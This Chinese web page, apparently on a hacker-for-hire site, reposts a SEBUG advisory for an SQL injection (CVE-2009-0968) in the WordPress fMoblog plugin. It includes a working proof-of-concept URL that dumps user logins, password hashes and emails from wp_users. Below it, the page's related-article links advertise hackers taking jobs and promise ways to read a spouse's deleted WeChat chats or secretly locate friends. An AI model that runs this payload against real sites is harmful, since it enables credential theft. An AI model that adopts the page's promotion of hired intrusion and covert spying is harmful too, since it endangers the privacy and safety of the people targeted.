WordPress fMoblog插件id参数SQL注入漏洞

访客3年前关于黑客接单633

影响版本:
Fahlstad fMoblog 2.1
漏洞描述:
BUGTRAQ  ID: 34147
CVE(CAN) ID: CVE-2009-0968

fMoblog是Wordpress所使用的移动博客插件,允许用户从手机张贴图形和描述等信息。

如果将page_id设置为已有的值的话,则fmoblog.php模块没有正确地验证index.php中对id参数所传送的输入便在SQL查询中使用,这允许远程攻击者通过提交恶意请求执行SQL注入攻击,完全入侵后端数据库系统。
 <*参考 
strange kevin (strange.kevin@gmail.com)
http://secuni *** /advisories/34341/.
*>
SEBUG安全建议:
厂商补丁:

Fredrik Fahlstad
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.fahlstad.se/wp-plugins/fmoblog/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

 

标签: 好话题

相关文章

怎么查看我老公删除的微信聊天记录啊

怎么查看我老公删除的微信聊天记录啊 “全国各省市三百多行业数据信息采集”、“python爬虫程序数据采集代写软件,专业老手,定制化服务”……在某二手交易平台上,有不少提供所谓“大数据”采集信息服...

微信怎么定位好友位置(用微信偷看对方位置)_好友位置

微信怎么定位好友位置(用微信偷看对方位置),当今越来越多的小合资人对微信奈何定位同事的地位、微信奈何打不开的疑问感乐趣,由于当今朋友们都非常想晓得。当今朋友们都想晓得微信奈何定位同事的地位,微信奈何打...

黑客牛人:没钱买电脑 手机编10万代码_牛人

本文转载自超能网,其他媒体转载须经超能网同意。大家有没有觉得这几年来已经很有个人电脑中毒的大规模事件了?如今的网络安全水平是比前几年好多了,最近一次大事件还是永恒之蓝病毒。现在的黑客也不再以开发病毒为...

可以查询删除他人的微信聊天记录-免费接单黑客QQ

一)穷苦人 午后,阳光和平时一样将路人的影子推的很长,奇有冷风吹过,人们下认识的缩着手,这一天和所有寻常的日子一样,光阴静好。 可以查询删除他人的微信聊天记录-免费接单黑客QQ 这一地,西南山区一户...

微信没有好友怎么解封(微信不是好友解封技巧)_微信解封

微信没有好友怎么解封(微信不是好友解封技巧),挪动互联网的发现极地面利便了人与人之间的交换。究竟上,自互联网降生以来,社群需求与搜索、电商一路成为互联网的三大贸易模式之一。在互联网的社群领域,唯独的霸...

24小时接单的顶级黑客这里可以找到

24小时接单的顶级黑客这里可以找到

谷歌母公司Alphabet 的生命科学部门Verily表示,他们将保留一项要求,暨冠状病毒检测网站的访问者必须使用Google账户登录。自上个月该网站启动以来,这项决定受到了严格审查。 Ver...